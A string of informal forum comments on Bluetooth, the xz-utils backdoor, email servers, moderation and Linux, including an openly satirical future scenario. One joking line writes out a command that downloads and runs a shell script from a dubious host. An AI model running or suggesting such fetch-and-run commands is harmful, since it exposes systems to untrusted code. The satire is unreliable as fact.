This should have been much more well thought out The wording, image, buttons, specific wording for each page.
They really screwed the pooch.
Another 4-6 months minimum before release. But quarterly numbers must be met.
This should have been much more well thought out The wording, image, buttons, specific wording for each page.
They really screwed the pooch.
Another 4-6 months minimum before release. But quarterly numbers must be met.
wget toteslegitdebian.app/installer.sh & chmod +x && ./installer.sh
was I not supposed to do that? but staxoverflown said it’s OK.
That does go a long way towards explaining why there are so many Bluetooth vulnerabilities, thanks for the info. Looking at the list of Bluetooth protocols wiki page gives me a headache. Surely there is a better standard, and I see things like HaLow, ZigBee, Z-Wave and other custom protocols, but it seems like there should be a very cleanly well-documented alternative to do the basics that everyone expects BT to do. This, coming from a total noob, speaking completely out of my anus. I just know that as a BT user, it’s a crapshoot whether there will be major audio delay, and pause/play actually worked, that’s if pairing works in the first place. But if something did come along I wonder if there would even be adoption among consumer devices.
Is it true the Bluetooth network stack is larger than the WiFi network stack? If so, why? I don’t know much about BT besides pairing, allowing calls and audio in/out, transferring files, and… is there more? It takes a day of reading documentation to understand all the advanced options on my ASUS router interface, and that’s without anything proprietary.
I’m just surprised and curious and never got a satisfying answer.
Honeypot? Dunno. Good discussions about it on hacker news.
And have eyes good enough to look very closely and detect any small . or `s that are out of place, and be current on all methods of sanitization, catching any and all confusing variable names doing funny things, and never getting mentally overloaded doing it.
I wouldn’t be surprised at all if teams at NSA & co had game months where the teams that find the highest number of vulns or develop the most damaging 0day exploits get a prize and challenge coin. Then you have the teams that develop the malware made to stay stealthy and intercept data for decades undetected, and the teams that play mail agent and intercept packages containing core internet backbone routers to put hardware ‘implants’ inside them.
These are the things Snowden showed us a small sliver of in 2013, over a decade ago, some of which was well aged by that point.
The days of doing illegal things for funsies on the internet, like learning how to hack hands-on, are over if you don’t want to really risk prison time. Download vulnerable virtual machines and hack on those.
But if you’re worried about a random maintainer or packager inserting something like a password stealer or backdoor and letting it hit a major distro with a disastrous backdoor that doesn’t require a PhD in quantum fuckography to understand, chances are likely big brother would alert someone to blow the whistle before it hit production, as they likely did with xzutils.
That was supposed to be or, not of.
In turn it compromises ssh authentication allows remote code execution via system(); if the connecting SSH certificate contains the backdoor key. No user account required. Nothing logged anywhere you’d expect. Full root code execution.
There is also a killswitch hard-coded into it, so it doesn’t affect machines of whatever state actor developed it.
It’s pretty clear this is a state actor, targeting a dependency of one of the most widely used system control software on Linux systems. There are likely tens or hundreds of other actors doing the exact same thing. This one was detected purely by chance, as it wasn’t even in the code for ssh.
If people ever wonder how cyber warfare could potentially cause a massive blackout and communications system interruption - this is how.
If you do end up hacking on it, and can remember to come back and say so, please let me know the name of the sub. Or if you make one now I’ll subscribe and hope to see it show up at some point.
Unfortunately it’s election season in the US, so any sources of conversation will be overtaken by bad actors. That means any politics subs, news subs, and especially US Politics subs. A whitelist could work but it would take a lot of work and make a lot of users mad, they tried on Reddit for a few subs and the list of allowed sites was huge. Then you also have people asking, can Fox News be blacklisted? And if it’s not, the propagandists will shift their strategy from fake websites to websites with low integrity like Fox and make the article fit their ‘opinion’… It’s a neverending cat and mouse game where the only strategy that works is well-trained moderators, and only if the bots (read: bot farms, humans) aren’t vying for a mod position as soon as it opens, which they will be.
Looking further into the website, especially the category descriptions, it’s largely AI written and looks like a propaganda website like masses created and spread during the last 2 American election seasons.
that’s ecstatic
Yes you can but for people that are looking to set one up today, not someone that’s been running one for 5 years and has basically a whitelisted reputation, it takes a lot to set it up and keep your domain and IP space reputation solid, along with DKIM/SPF/etc records, all the latest stuff like Google’s new mandatory unsubscribe header that will keep coming up. Even if a couple people on your hosting provider start spamming, if they’re in the same IP space as you, You’re going to be getting filtered more heavily for using a “bad neighbor” host. The big corporate/“nonprofit” guys like Spamhaus and Google and Microsoft are basically those controlling corporations for emails, what they say in their spec pretty much goes. They’re making it h em oarder for people to set up and run their own email servers, whether that is the outright intended effect for their mandatory changes or not.
Don’t get me started on trying to set up a business newsletter account on your new corporate mail server, holy hell, the warm-up itself is pulling hairs. There’s a reason companies like MailChimp, Zapier, et al make so much money.
Facebook was all those things in the beginning.
Reddit was all those things in the beginning.
Twitter was all those things in the beginning.
LinkedIn was all those things in the beginning.
The Internet in general was all those things in the beginning.
I’ve never used IG/TT but I assume they were all those things in the beginning.
Lemmy will probably be said to be most of those things in the beginning.
With age comes wisdom, which comes once you’ve seen the pattern happen enough times, which can only come with age.
Sincerely,
One of those old people.
The Y2K38 Epochalypse bug hit 2 years early due to Microsoft’s rushed implementation of Windows Subsystem for Linux under CEO Elon Musk, causing all newer systems running Windows to combust due to a combination of the bug, and a cyberattack on Musk’s new chip fab plant in the state of Mexas. The only widespread choices after that are WacOS and Ubuntrue, both parent companies owned by Elon Musk after winning in his presidential prelection in 2026 and removing all antitrust legislation. However there is a hobbyist Unix distribution still being passed around called Briarch that fixed the 2038 problem in 2025 when development started, but you have to be in close proximity to someone with it to get it, which is easy in the country of California but not as easy east of the Nutah border, you really have to trust someone to even ask if they have it.
What is this, an election for blobfish?
Year of the Linux Desktop! 1999-2035!
I do the same, but I have been trying to build the habit of not doing it.
I assume the problem is hardware. Matt’s hardware didn’t work well with LM, therefore Matt thinks LM sucks… I do wish there was better hardware support but it’s the reason apple went with 1 product = 1 OS = 1 general set of hardware. Sure not every iPhone has the same hardware, but that’s why they have the model numbers, and it’s so much easier to test 200 model mixes than 2,000,000 (Android). Windows gets all the debug info sent directly to them like the others but they also have a huge stack of hardware they can use or they can buy it to test.